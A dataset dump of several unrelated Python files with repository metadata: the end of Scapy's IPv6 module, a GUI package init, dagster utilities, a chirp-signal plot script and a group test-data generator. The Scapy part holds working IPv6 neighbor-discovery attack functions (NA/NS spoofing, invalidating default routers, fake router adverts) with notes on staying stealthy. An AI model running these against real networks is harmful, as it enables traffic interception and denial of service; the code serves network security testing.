rep /= ICMPv6ND_NA(tgt=tgt, S=0, R=0, O=1)
rep /= ICMPv6NDOptDstLLAddr(lladdr=reply_mac)
sendp(rep, iface=iface, verbose=0)
print "Reply NA for target address %s (received from %s)" % (tgt, mac)
_NDP_Attack_DAD_DoS(na_reply_callback, iface, mac_src_filter,
tgt_filter, reply_mac)
def NDP_Attack_NA_Spoofing(iface=None, mac_src_filter=None, tgt_filter=None,
reply_mac=None, router=False):
"""
The main purpose of this function is to send fake Neighbor Advertisement
messages to a victim. As the emission of unsolicited Neighbor Advertisement
is pretty pointless (from an attacker standpoint) because it will not
lead to a modification of a victim's neighbor cache, the function send
advertisements in response to received NS (NS sent as part of the DAD,
i.e. with an unspecified address as source, are not considered).
By default, the fake NA sent to create the DoS uses:
- as target address the target address found in received NS.
- as IPv6 source address: the target address
- as IPv6 destination address: the source IPv6 address of received NS
message.
- the mac address of the interface as source (or reply_mac, see below).
- the source mac address of the received NS as destination macs address
of the emitted NA.
- A Target Link-Layer address option (ICMPv6NDOptDstLLAddr)
filled with the mac address used as source of the NA.
Following arguments can be used to change the behavior:
iface: a specific interface (e.g. "eth0") of the system on which the
DoS should be launched. If None is provided conf.iface is used.
mac_src_filter: a mac address (e.g "00:13:72:8c:b5:69") to filter on.
Only NS messages received from this source will trigger replies.
This allows limiting the effects of the DoS to a single target by
filtering on its mac address. The default value is None: the DoS
is not limited to a specific mac address.
tgt_filter: Same as previous but for a specific target IPv6 address for
received NS. If the target address in the NS message (not the IPv6
destination address) matches that address, then a fake reply will
be sent, i.e. the emitter will be a target of the DoS.
reply_mac: allow specifying a specific source mac address for the reply,
i.e. to prevent the use of the mac address of the interface. This
address will also be used in the Target Link-Layer Address option.
router: by the default (False) the 'R' flag in the NA used for the reply
is not set. If the parameter is set to True, the 'R' flag in the
NA is set, advertising us as a router.
Please, keep the following in mind when using the function: for obvious
reasons (kernel space vs. Python speed), when the target of the address
resolution is on the link, the sender of the NS receives 2 NA messages
in a row, the valid one and our fake one. The second one will overwrite
the information provided by the first one, i.e. the natural latency of
Scapy helps here.
In practice, on a common Ethernet link, the emission of the NA from the
genuine target (kernel stack) usually occurs in the same millisecond as
the receipt of the NS. The NA generated by Scapy6 will usually come after
something 20+ ms. On a usual testbed for instance, this difference is
sufficient to have the first data packet sent from the victim to the
destination before it even receives our fake NA.
"""
def is_request(req, mac_src_filter, tgt_filter):
"""
Check if packet req is a request
"""
# Those simple checks are based on Section 5.4.2 of RFC 4862
if not (Ether in req and IPv6 in req and ICMPv6ND_NS in req):
return 0
mac_src = req[Ether].src
if mac_src_filter and mac_src != mac_src_filter:
return 0
# Source must NOT be the unspecified address
if req[IPv6].src == "::":
return 0
tgt = socket.inet_pton(socket.AF_INET6, req[ICMPv6ND_NS].tgt)
if tgt_filter and tgt != tgt_filter:
return 0
dst = req[IPv6].dst
if in6_isllsnmaddr(dst): # Address is Link Layer Solicited Node mcast.
# If this is a real address resolution NS, then the destination
# address of the packet is the link-local solicited node multicast
# address associated with the target of the NS.
# Otherwise, the NS is a NUD related one, i.e. the peer is
# unicasting the NS to check the target is still alive (L2
# information is still in its cache and it is verified)
received_snma = socket.inet_pton(socket.AF_INET6, dst)
expected_snma = in6_getnsma(tgt)
if received_snma != expected_snma:
print "solicited node multicast @ does not match target @!"
return 0
return 1
def reply_callback(req, reply_mac, router, iface):
"""
Callback that reply to a NS with a spoofed NA
"""
# Let's build a reply (as defined in Section 7.2.4. of RFC 4861) and
# send it back.
mac = req[Ether].src
pkt = req[IPv6]
src = pkt.src
tgt = req[ICMPv6ND_NS].tgt
rep = Ether(src=reply_mac, dst=mac)/IPv6(src=tgt, dst=src)
rep /= ICMPv6ND_NA(tgt=tgt, S=1, R=router, O=1) # target from the NS
# "If the solicitation IP Destination Address is not a multicast
# address, the Target Link-Layer Address option MAY be omitted"
# Given our purpose, we always include it.
rep /= ICMPv6NDOptDstLLAddr(lladdr=reply_mac)
sendp(rep, iface=iface, verbose=0)
print "Reply NA for target address %s (received from %s)" % (tgt, mac)
if not iface:
iface = conf.iface
# To prevent sniffing our own traffic
if not reply_mac:
reply_mac = get_if_hwaddr(iface)
sniff_filter = "icmp6 and not ether src %s" % reply_mac
router = (router and 1) or 0 # Value of the R flags in NA
sniff(store=0,
filter=sniff_filter,
lfilter=lambda x: is_request(x, mac_src_filter, tgt_filter),
prn=lambda x: reply_callback(x, reply_mac, router, iface),
iface=iface)
def NDP_Attack_NS_Spoofing(src_lladdr=None, src=None, target="2001:db8::1",
dst=None, src_mac=None, dst_mac=None, loop=True,
inter=1, iface=None):
"""
The main purpose of this function is to send fake Neighbor Solicitations
messages to a victim, in order to either create a new entry in its neighbor
cache or update an existing one. In section 7.2.3 of RFC 4861, it is stated
that a node SHOULD create the entry or update an existing one (if it is not
currently performing DAD for the target of the NS). The entry's reachability
state is set to STALE.
The two main parameters of the function are the source link-layer address
(carried by the Source Link-Layer Address option in the NS) and the
source address of the packet.
Unlike some other NDP_Attack_* function, this one is not based on a
stimulus/response model. When called, it sends the same NS packet in loop
every second (the default)
Following arguments can be used to change the format of the packets:
src_lladdr: the MAC address used in the Source Link-Layer Address option
included in the NS packet. This is the address that the peer should
associate in its neighbor cache with the IPv6 source address of the
packet. If None is provided, the mac address of the interface is
used.
src: the IPv6 address used as source of the packet. If None is provided,
an address associated with the emitting interface will be used
(based on the destination address of the packet).
target: the target address of the NS packet. If no value is provided,
a dummy address (2001:db8::1) is used. The value of the target
has a direct impact on the destination address of the packet if it
is not overridden. By default, the solicited-node multicast address
associated with the target is used as destination address of the
packet. Consider specifying a specific destination address if you
intend to use a target address different than the one of the victim.
dst: The destination address of the NS. By default, the solicited node
multicast address associated with the target address (see previous
parameter) is used if no specific value is provided. The victim
is not expected to check the destination address of the packet,
so using a multicast address like ff02::1 should work if you want
the attack to target all hosts on the link. On the contrary, if
you want to be more stealth, you should provide the target address
for this parameter in order for the packet to be sent only to the
victim.
src_mac: the MAC address used as source of the packet. By default, this
is the address of the interface. If you want to be more stealth,
feel free to use something else. Note that this address is not the
that the victim will use to populate its neighbor cache.
dst_mac: The MAC address used as destination address of the packet. If
the IPv6 destination address is multicast (all-nodes, solicited
node, ...), it will be computed. If the destination address is
unicast, a neighbor solicitation will be performed to get the
associated address. If you want the attack to be stealth, you
can provide the MAC address using this parameter.
loop: By default, this parameter is True, indicating that NS packets
will be sent in loop, separated by 'inter' seconds (see below).
When set to False, a single packet is sent.
inter: When loop parameter is True (the default), this parameter provides
the interval in seconds used for sending NS packets.
iface: to force the sending interface.
"""
if not iface:
iface = conf.iface
# Use provided MAC address as source link-layer address option
# or the MAC address of the interface if none is provided.
if not src_lladdr:
src_lladdr = get_if_hwaddr(iface)
# Prepare packets parameters
ether_params = {}
if src_mac:
ether_params["src"] = src_mac
if dst_mac:
ether_params["dst"] = dst_mac
ipv6_params = {}
if src:
ipv6_params["src"] = src
if dst:
ipv6_params["dst"] = dst
else:
# Compute the solicited-node multicast address
# associated with the target address.
tmp = inet_ntop(socket.AF_INET6,
in6_getnsma(inet_pton(socket.AF_INET6, target)))
ipv6_params["dst"] = tmp
pkt = Ether(**ether_params)
pkt /= IPv6(**ipv6_params)
pkt /= ICMPv6ND_NS(tgt=target)
pkt /= ICMPv6NDOptSrcLLAddr(lladdr=src_lladdr)
sendp(pkt, inter=inter, loop=loop, iface=iface, verbose=0)
def NDP_Attack_Kill_Default_Router(iface=None, mac_src_filter=None,
ip_src_filter=None, reply_mac=None,
tgt_mac=None):
"""
The purpose of the function is to monitor incoming RA messages
sent by default routers (RA with a non-zero Router Lifetime values)
and invalidate them by immediately replying with fake RA messages
advertising a zero Router Lifetime value.
The result on receivers is that the router is immediately invalidated,
i.e. the associated entry is discarded from the default router list
and destination cache is updated to reflect the change.
By default, the function considers all RA messages with a non-zero
Router Lifetime value but provides configuration knobs to allow
filtering RA sent by specific routers (Ethernet source address).
With regard to emission, the multicast all-nodes address is used
by default but a specific target can be used, in order for the DoS to
apply only to a specific host.
More precisely, following arguments can be used to change the behavior:
iface: a specific interface (e.g. "eth0") of the system on which the
DoS should be launched. If None is provided conf.iface is used.
mac_src_filter: a mac address (e.g "00:13:72:8c:b5:69") to filter on.
Only RA messages received from this source will trigger replies.
If other default routers advertised their presence on the link,
their clients will not be impacted by the attack. The default
value is None: the DoS is not limited to a specific mac address.
ip_src_filter: an IPv6 address (e.g. fe80::21e:bff:fe4e:3b2) to filter
on. Only RA messages received from this source address will trigger
replies. If other default routers advertised their presence on the
link, their clients will not be impacted by the attack. The default
value is None: the DoS is not limited to a specific IPv6 source
address.
reply_mac: allow specifying a specific source mac address for the reply,
i.e. to prevent the use of the mac address of the interface.
tgt_mac: allow limiting the effect of the DoS to a specific host,
by sending the "invalidating RA" only to its mac address.
"""
def is_request(req, mac_src_filter, ip_src_filter):
"""
Check if packet req is a request
"""
if not (Ether in req and IPv6 in req and ICMPv6ND_RA in req):
return 0
mac_src = req[Ether].src
if mac_src_filter and mac_src != mac_src_filter:
return 0
ip_src = req[IPv6].src
if ip_src_filter and ip_src != ip_src_filter:
return 0
# Check if this is an advertisement for a Default Router
# by looking at Router Lifetime value
if req[ICMPv6ND_RA].routerlifetime == 0:
return 0
return 1
def ra_reply_callback(req, reply_mac, tgt_mac, iface):
"""
Callback that sends an RA with a 0 lifetime
"""
# Let's build a reply and send it
src = req[IPv6].src
# Prepare packets parameters
ether_params = {}
if reply_mac:
ether_params["src"] = reply_mac
if tgt_mac:
ether_params["dst"] = tgt_mac
# Basis of fake RA (high pref, zero lifetime)
rep = Ether(**ether_params)/IPv6(src=src, dst="ff02::1")
rep /= ICMPv6ND_RA(prf=1, routerlifetime=0)
# Add it a PIO from the request ...
tmp = req
while ICMPv6NDOptPrefixInfo in tmp:
pio = tmp[ICMPv6NDOptPrefixInfo]
tmp = pio.payload
del(pio.payload)
rep /= pio
# ... and source link layer address option
if ICMPv6NDOptSrcLLAddr in req:
mac = req[ICMPv6NDOptSrcLLAddr].lladdr
else:
mac = req[Ether].src
rep /= ICMPv6NDOptSrcLLAddr(lladdr=mac)
sendp(rep, iface=iface, verbose=0)
print "Fake RA sent with source address %s" % src
if not iface:
iface = conf.iface
# To prevent sniffing our own traffic
if not reply_mac:
reply_mac = get_if_hwaddr(iface)
sniff_filter = "icmp6 and not ether src %s" % reply_mac
sniff(store=0,
filter=sniff_filter,
lfilter=lambda x: is_request(x, mac_src_filter, ip_src_filter),
prn=lambda x: ra_reply_callback(x, reply_mac, tgt_mac, iface),
iface=iface)
def NDP_Attack_Fake_Router(ra, iface=None, mac_src_filter=None,
ip_src_filter=None):
"""
The purpose of this function is to send provided RA message at layer 2
(i.e. providing a packet starting with IPv6 will not work) in response
to received RS messages. In the end, the function is a simple wrapper
around sendp() that monitor the link for RS messages.
It is probably better explained with an example:
>>> ra = Ether()/IPv6()/ICMPv6ND_RA()
>>> ra /= ICMPv6NDOptPrefixInfo(prefix="2001:db8:1::", prefixlen=64)
>>> ra /= ICMPv6NDOptPrefixInfo(prefix="2001:db8:2::", prefixlen=64)
>>> ra /= ICMPv6NDOptSrcLLAddr(lladdr="00:11:22:33:44:55")
>>> NDP_Attack_Fake_Router(ra, iface="eth0")
Fake RA sent in response to RS from fe80::213:58ff:fe8c:b573
Fake RA sent in response to RS from fe80::213:72ff:fe8c:b9ae
...
Following arguments can be used to change the behavior:
ra: the RA message to send in response to received RS message.
iface: a specific interface (e.g. "eth0") of the system on which the
DoS should be launched. If none is provided, conf.iface is
used.
mac_src_filter: a mac address (e.g "00:13:72:8c:b5:69") to filter on.
Only RS messages received from this source will trigger a reply.
Note that no changes to provided RA is done which imply that if
you intend to target only the source of the RS using this option,
you will have to set the Ethernet destination address to the same
value in your RA.
The default value for this parameter is None: no filtering on the
source of RS is done.
ip_src_filter: an IPv6 address (e.g. fe80::21e:bff:fe4e:3b2) to filter
on. Only RS messages received from this source address will trigger
replies. Same comment as for previous argument apply: if you use
the option, you will probably want to set a specific Ethernet
destination address in the RA.
"""
def is_request(req, mac_src_filter, ip_src_filter):
"""
Check if packet req is a request
"""
if not (Ether in req and IPv6 in req and ICMPv6ND_RS in req):
return 0
mac_src = req[Ether].src
if mac_src_filter and mac_src != mac_src_filter:
return 0
ip_src = req[IPv6].src
if ip_src_filter and ip_src != ip_src_filter:
return 0
return 1
def ra_reply_callback(req, iface):
"""
Callback that sends an RA in reply to an RS
"""
src = req[IPv6].src
sendp(ra, iface=iface, verbose=0)
print "Fake RA sent in response to RS from %s" % src
if not iface:
iface = conf.iface
sniff_filter = "icmp6"
sniff(store=0,
filter=sniff_filter,
lfilter=lambda x: is_request(x, mac_src_filter, ip_src_filter),
prn=lambda x: ra_reply_callback(x, iface),
iface=iface)
#############################################################################
#############################################################################
### Layers binding ###
#############################################################################
#############################################################################
conf.l3types.register(ETH_P_IPV6, IPv6)
conf.l2types.register(31, IPv6)
bind_layers(Ether, IPv6, type = 0x86dd )
bind_layers(CookedLinux, IPv6, proto = 0x86dd )
bind_layers(IPerror6, TCPerror, nh = socket.IPPROTO_TCP )
bind_layers(IPerror6, UDPerror, nh = socket.IPPROTO_UDP )
bind_layers(IPv6, TCP, nh = socket.IPPROTO_TCP )
bind_layers(IPv6, UDP, nh = socket.IPPROTO_UDP )
bind_layers(IP, IPv6, proto = socket.IPPROTO_IPV6 )
bind_layers(IPv6, IPv6, nh = socket.IPPROTO_IPV6 )
bind_layers(IPv6, IP, nh = socket.IPPROTO_IPIP )
| 39.302625
| 156
| 0.541641
|
e48975c5bc90fc7e6b83deae5ccf55ae04d73f2d
| 262
|
py
|
Python
|
einkd/gui/components/__init__.py
|
trickeydan/einkd
|
ca5bbdde8c5a6ab31ffa6745b42cb69a19eb1090
|
[
"MIT"
] | null | null | null |
einkd/gui/components/__init__.py
|
trickeydan/einkd
|
ca5bbdde8c5a6ab31ffa6745b42cb69a19eb1090
|
[
"MIT"
] | null | null | null |
einkd/gui/components/__init__.py
|
trickeydan/einkd
|
ca5bbdde8c5a6ab31ffa6745b42cb69a19eb1090
|
[
"MIT"
] | null | null | null |
"""Components in the GUI."""
from .component import Component
from .filled import FilledComponent
from .image import ImageComponent
from .text import TextComponent
__all__ = [
"Component",
"FilledComponent",
"ImageComponent",
"TextComponent",
]
| 20.153846
| 35
| 0.729008
|
292e90e0541ba067016ece7813c04bdc9c8507ad
| 14,963
|
py
|
Python
|
python_modules/dagster/dagster/utils/__init__.py
|
wingyplus/dagster
|
1771b49f58c62141628da6a767516d3dcb9637d6
|
[
"Apache-2.0"
] | null | null | null |
python_modules/dagster/dagster/utils/__init__.py
|
wingyplus/dagster
|
1771b49f58c62141628da6a767516d3dcb9637d6
|
[
"Apache-2.0"
] | null | null | null |
python_modules/dagster/dagster/utils/__init__.py
|
wingyplus/dagster
|
1771b49f58c62141628da6a767516d3dcb9637d6
|
[
"Apache-2.0"
] | null | null | null |
import contextlib
import datetime
import errno
import functools
import inspect
import multiprocessing
import os
import re
import signal
import socket
import subprocess
import sys
import tempfile
import threading
from collections import namedtuple
from enum import Enum
from warnings import warn
import six
import yaml
from six.moves import configparser
from dagster import check
from dagster.core.errors import DagsterInvariantViolationError
from dagster.seven import IS_WINDOWS, thread
from dagster.seven.abc import Mapping
from dagster.utils.merger import merge_dicts
from .yaml_utils import load_yaml_from_glob_list, load_yaml_from_globs, load_yaml_from_path
if sys.version_info > (3,):
from pathlib import Path # pylint: disable=import-error
else:
from pathlib2 import Path # pylint: disable=import-error
EPOCH = datetime.datetime.utcfromtimestamp(0)
# 2/3 compatibility
PICKLE_PROTOCOL = 2
DEFAULT_REPOSITORY_YAML_FILENAME = 'repository.yaml'
DEFAULT_WORKSPACE_YAML_FILENAME = 'workspace.yaml'
def file_relative_path(dunderfile, relative_path):
'''
This function is useful when one needs to load a file that is
relative to the position of the current file. (Such as when
you encode a configuration file path in source file and want
in runnable in any current working directory)
It is meant to be used like the following:
file_relative_path(__file__, 'path/relative/to/file')
'''
check.str_param(dunderfile, 'dunderfile')
check.str_param(relative_path, 'relative_path')
return os.path.join(os.path.dirname(dunderfile), relative_path)
def script_relative_path(file_path):
'''
Useful for testing with local files. Use a path relative to where the
test resides and this function will return the absolute path
of that file. Otherwise it will be relative to script that
ran the test
Note: this is function is very, very expensive (on the order of 1
millisecond per invocation) so this should only be used in performance
insensitive contexts. Prefer file_relative_path for anything with
performance constraints.
'''
# from http://bit.ly/2snyC6s
check.str_param(file_path, 'file_path')
scriptdir = inspect.stack()[1][1]
return os.path.abspath(os.path.join(os.path.dirname(os.path.abspath(scriptdir)), file_path))
# Adapted from https://github.com/okunishinishi/python-stringcase/blob/master/stringcase.py
def camelcase(string):
check.str_param(string, 'string')
string = re.sub(r'^[\-_\.]', '', str(string))
if not string:
return string
return str(string[0]).upper() + re.sub(
r'[\-_\.\s]([a-z])', lambda matched: str(matched.group(1)).upper(), string[1:]
)
def ensure_single_item(ddict):
check.dict_param(ddict, 'ddict')
check.param_invariant(len(ddict) == 1, 'ddict', 'Expected dict with single item')
return list(ddict.items())[0]
@contextlib.contextmanager
def pushd(path):
old_cwd = os.getcwd()
os.chdir(path)
try:
yield path
finally:
os.chdir(old_cwd)
def safe_isfile(path):
'''"Backport of Python 3.8 os.path.isfile behavior.
This is intended to backport https://docs.python.org/dev/whatsnew/3.8.html#os-path. I'm not
sure that there are other ways to provoke this behavior on Unix other than the null byte,
but there are certainly other ways to do it on Windows. Afaict, we won't mask other
ValueErrors, and the behavior in the status quo ante is rough because we risk throwing an
unexpected, uncaught ValueError from very deep in our logic.
'''
try:
return os.path.isfile(path)
except ValueError:
return False
def mkdir_p(path):
try:
os.makedirs(path)
return path
except OSError as exc: # Python >2.5
if exc.errno == errno.EEXIST and os.path.isdir(path):
pass
else:
raise
class frozendict(dict):
def __readonly__(self, *args, **kwargs):
raise RuntimeError("Cannot modify ReadOnlyDict")
# https://docs.python.org/3/library/pickle.html#object.__reduce__
#
# For a dict, the default behavior for pickle is to iteratively call __setitem__ (see 5th item
# in __reduce__ tuple). Since we want to disable __setitem__ and still inherit dict, we
# override this behavior by defining __reduce__. We return the 3rd item in the tuple, which is
# passed to __setstate__, allowing us to restore the frozendict.
def __reduce__(self):
return (frozendict, (), dict(self))
def __setstate__(self, state):
self.__init__(state)
__setitem__ = __readonly__
__delitem__ = __readonly__
pop = __readonly__
popitem = __readonly__
clear = __readonly__
update = __readonly__
setdefault = __readonly__
del __readonly__
class frozenlist(list):
def __readonly__(self, *args, **kwargs):
raise RuntimeError("Cannot modify ReadOnlyList")
__setitem__ = __readonly__
__delitem__ = __readonly__
append = __readonly__
clear = __readonly__
extend = __readonly__
insert = __readonly__
pop = __readonly__
remove = __readonly__
reverse = __readonly__
sort = __readonly__
def make_readonly_value(value):
if isinstance(value, list):
return frozenlist(list(map(make_readonly_value, value)))
elif isinstance(value, dict):
return frozendict({key: make_readonly_value(value) for key, value in value.items()})
else:
return value
def get_prop_or_key(elem, key):
if isinstance(elem, Mapping):
return elem.get(key)
else:
return getattr(elem, key)
def list_pull(alist, key):
return list(map(lambda elem: get_prop_or_key(elem, key), alist))
def get_multiprocessing_context():
# Set execution method to spawn, to avoid fork and to have same behavior between platforms.
# Older versions are stuck with whatever is the default on their platform (fork on
# Unix-like and spawn on windows)
#
# https://docs.python.org/3/library/multiprocessing.html#multiprocessing.get_context
if hasattr(multiprocessing, 'get_context'):
return multiprocessing.get_context('spawn')
else:
return multiprocessing
def all_none(kwargs):
for value in kwargs.values():
if value is not None:
return False
return True
def check_script(path, return_code=0):
try:
subprocess.check_output([sys.executable, path])
except subprocess.CalledProcessError as exc:
if return_code != 0:
if exc.returncode == return_code:
return
raise
def check_cli_execute_file_pipeline(path, pipeline_fn_name, env_file=None):
cli_cmd = [
sys.executable,
'-m',
'dagster',
'pipeline',
'execute',
'-f',
path,
'-a',
pipeline_fn_name,
]
if env_file:
cli_cmd.append('-c')
cli_cmd.append(env_file)
try:
subprocess.check_output(cli_cmd)
except subprocess.CalledProcessError as cpe:
print(cpe) # pylint: disable=print-call
raise cpe
def safe_tempfile_path_unmanaged():
# This gets a valid temporary file path in the safest possible way, although there is still no
# guarantee that another process will not create a file at this path. The NamedTemporaryFile is
# deleted when the context manager exits and the file object is closed.
#
# This is preferable to using NamedTemporaryFile as a context manager and passing the name
# attribute of the file object around because NamedTemporaryFiles cannot be opened a second time
# if already open on Windows NT or later:
# https://docs.python.org/3.8/library/tempfile.html#tempfile.NamedTemporaryFile
# https://github.com/dagster-io/dagster/issues/1582
with tempfile.NamedTemporaryFile() as fd:
path = fd.name
return Path(path).as_posix()
@contextlib.contextmanager
def safe_tempfile_path():
try:
path = safe_tempfile_path_unmanaged()
yield path
finally:
if os.path.exists(path):
os.unlink(path)
def ensure_gen(thing_or_gen):
if not inspect.isgenerator(thing_or_gen):
def _gen_thing():
yield thing_or_gen
return _gen_thing()
return thing_or_gen
def ensure_dir(file_path):
try:
os.makedirs(file_path)
except OSError as e:
if e.errno != errno.EEXIST:
raise
def ensure_file(path):
ensure_dir(os.path.dirname(path))
if not os.path.exists(path):
touch_file(path)
def touch_file(path):
ensure_dir(os.path.dirname(path))
with open(path, 'a'):
os.utime(path, None)
def _kill_on_event(termination_event):
termination_event.wait()
if IS_WINDOWS:
# This will raise a KeyboardInterrupt in python land - meaning this wont be able to
# interrupt things like sleep()
thread.interrupt_main()
else:
# If on unix send an os level signal to interrupt any situation we may be stuck in
os.kill(os.getpid(), signal.SIGINT)
# Function to be invoked by daemon thread in processes which seek to be cancellable.
# The motivation for this approach is to be able to exit cleanly on Windows. An alternative
# path is to change how the processes are opened and send CTRL_BREAK signals, which at
# the time of authoring seemed a more costly approach.
#
# Reading for the curious:
# * https://stackoverflow.com/questions/35772001/how-to-handle-the-signal-in-python-on-windows-machine
# * https://stefan.sofa-rockers.org/2013/08/15/handling-sub-process-hierarchies-python-linux-os-x/
def start_termination_thread(termination_event):
check.inst_param(
termination_event, 'termination_event', ttype=type(get_multiprocessing_context().Event())
)
int_thread = threading.Thread(
target=_kill_on_event, args=(termination_event,), name='kill-on-event'
)
int_thread.daemon = True
int_thread.start()
def datetime_as_float(dt):
check.inst_param(dt, 'dt', datetime.datetime)
return float((dt - EPOCH).total_seconds())
# hashable frozen string to string dict
class frozentags(frozendict):
def __init__(self, *args, **kwargs):
super(frozentags, self).__init__(*args, **kwargs)
check.dict_param(self, 'self', key_type=str, value_type=str)
def __hash__(self):
return hash(tuple(sorted(self.items())))
def updated_with(self, new_tags):
check.dict_param(new_tags, 'new_tags', key_type=str, value_type=str)
updated = dict(self)
for key, value in new_tags.items():
updated[key] = value
return frozentags(updated)
class EventGenerationManager(object):
''' Utility class that wraps an event generator function, that also yields a single instance of
a typed object. All events yielded before the typed object are yielded through the method
`generate_setup_events` and all events yielded after the typed object are yielded through the
method `generate_teardown_events`.
This is used to help replace the context managers used in pipeline initialization with
generators so that we can begin emitting initialization events AND construct a pipeline context
object, while managing explicit setup/teardown.
This does require calling `generate_setup_events` AND `generate_teardown_events` in order to
get the typed object.
'''
def __init__(self, generator, object_cls, require_object=True):
self.generator = check.generator(generator)
self.object_cls = check.type_param(object_cls, 'object_cls')
self.require_object = check.bool_param(require_object, 'require_object')
self.object = None
self.did_setup = False
self.did_teardown = False
def generate_setup_events(self):
self.did_setup = True
try:
while self.object is None:
obj = next(self.generator)
if isinstance(obj, self.object_cls):
self.object = obj
else:
yield obj
except StopIteration:
if self.require_object:
check.inst_param(
self.object,
'self.object',
self.object_cls,
'generator never yielded object of type {}'.format(self.object_cls.__name__),
)
def get_object(self):
if not self.did_setup:
check.failed('Called `get_object` before `generate_setup_events`')
return self.object
def generate_teardown_events(self):
self.did_teardown = True
if self.object:
for event in self.generator:
yield event
def utc_datetime_from_timestamp(timestamp):
tz = None
if sys.version_info.major >= 3 and sys.version_info.minor >= 2:
from datetime import timezone
tz = timezone.utc
else:
import pytz
tz = pytz.utc
return datetime.datetime.fromtimestamp(timestamp, tz=tz)
def is_enum_value(value):
return False if value is None else issubclass(value.__class__, Enum)
def git_repository_root():
return six.ensure_str(subprocess.check_output(['git', 'rev-parse', '--show-toplevel']).strip())
def segfault():
'''Reliable cross-Python version segfault.
https://bugs.python.org/issue1215#msg143236
'''
import ctypes
ctypes.string_at(0)
def find_free_port():
with contextlib.closing(socket.socket(socket.AF_INET, socket.SOCK_STREAM)) as s:
s.bind(('', 0))
s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
return s.getsockname()[1]
@contextlib.contextmanager
def alter_sys_path(to_add, to_remove):
to_restore = [path for path in sys.path]
# remove paths
for path in to_remove:
if path in sys.path:
sys.path.remove(path)
# add paths
for path in to_add:
sys.path.insert(0, path)
try:
yield
finally:
sys.path = to_restore
@contextlib.contextmanager
def restore_sys_modules():
sys_modules = {k: v for k, v in sys.modules.items()}
try:
yield
finally:
sys.modules = sys_modules
def process_is_alive(pid):
if IS_WINDOWS:
import psutil # pylint: disable=import-error
return psutil.pid_exists(pid=pid)
else:
try:
subprocess.check_output(['ps', str(pid)])
except subprocess.CalledProcessError as exc:
assert exc.returncode == 1
return False
return True
def compose(*args):
'''
Compose python functions args such that compose(f, g)(x) is equivalent to f(g(x)).
'''
# reduce using functional composition over all the arguments, with the identity function as
# initializer
return functools.reduce(lambda f, g: lambda x: f(g(x)), args, lambda x: x)
| 29.629703
| 103
| 0.682818
|
0ff3c4c0e69651b300fbd198307e9b31a6f4b23f
| 981
|
py
|
Python
|
python/dynamic_graph/sot/torque_control/tests/test_chirp.py
|
jviereck/sot-torque-control
|
90409a656e5b5be4dd4ff937724154579861c20f
|
[
"BSD-2-Clause"
] | null | null | null |
python/dynamic_graph/sot/torque_control/tests/test_chirp.py
|
jviereck/sot-torque-control
|
90409a656e5b5be4dd4ff937724154579861c20f
|
[
"BSD-2-Clause"
] | null | null | null |
python/dynamic_graph/sot/torque_control/tests/test_chirp.py
|
jviereck/sot-torque-control
|
90409a656e5b5be4dd4ff937724154579861c20f
|
[
"BSD-2-Clause"
] | null | null | null |
# -*- coding: utf-8 -*-
"""
Created on Wed Jan 28 16:54:01 2015
Test the expressions for the acceleration limits that guarantees the feasibility
of the position and velocity limits in the feature.
These expression have been derived using the viability theory.
@author: adelpret
"""
import numpy as np
from numpy.random import random
from plot_utils import create_empty_figure
import plot_utils
import matplotlib.pyplot as plt
plot_utils.DEFAULT_LINE_WIDTH = 5;
N = 15000;
f0 = 0.3;
f1 = 3;
tt = 15.0;
dt = 0.001;
phi_0 = np.pi*tt*(f0-f1);
t = 0;
x = np.zeros(N);
f = np.zeros(N);
phi = np.zeros(N);
k = 2*(f1-f0)/tt;
for i in range(N):
if(t<0.5*tt):
f[i] = f0 + k*t;
phi[i] = 2*np.pi*t*(f0+0.5*k*t);
else:
f[i] = f1 + 0.5*k*tt - k*t;
phi[i] = phi_0 + 2*np.pi*t*(f1+0.5*k*tt - 0.5*k*t);
x[i] = 0.5*(1.0-np.cos(phi[i]));
t = t + dt;
(fig,ax) = create_empty_figure(3,1);
ax[0].plot(x);
ax[1].plot(f);
ax[2].plot(phi);
plt.show();
| 21.326087
| 80
| 0.618756
|
38f175529ae3c623979e0a8341957f8393ce5412
| 992
|
py
|
Python
|
generator/group.py
|
nikor1337/python_training
|
675e0209ec50696fc294658bbcaa267752de79f0
|
[
"Apache-2.0"
] | null | null | null |
generator/group.py
|
nikor1337/python_training
|
675e0209ec50696fc294658bbcaa267752de79f0
|
[
"Apache-2.0"
] | null | null | null |
generator/group.py
|
nikor1337/python_training
|
675e0209ec50696fc294658bbcaa267752de79f0
|
[
"Apache-2.0"
] | 1
|
2021-02-24T06:55:52.000Z
|
2021-02-24T06:55:52.000Z
|
from model.group import Group
import random
import string
import os.path
import jsonpickle
import getopt
import sys
try:
opts, args = getopt.getopt(sys.argv[1:], "n:f:", ["number of groups", "file"])
except getopt.GetoptError as err:
getopt.usage()
sys.exit(2)
n = 5
f = "data/groups.json"
for o, a in opts:
if o == "-n":
n = int(a)
elif o == "-f":
f = a
def random_string(prefix, maxlen):
symbols = string.ascii_letters + string.digits + string.punctuation + " "*10
return prefix + "".join([random.choice(symbols) for i in range(random.randrange(maxlen))])
testdata = [Group(name="", header="", footer="")] + [
Group(name=random_string("name", 10), header=random_string("header", 10), footer=random_string("footer", 10))
for i in range(n)
]
file = os.path.join(os.path.dirname(os.path.abspath(__file__)), "..", f)
with open(file, "w") as out:
jsonpickle.set_encoder_options("json", indent=2)
out.write(jsonpickle.encode(testdata))
| 25.435897
| 111
| 0.660282
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.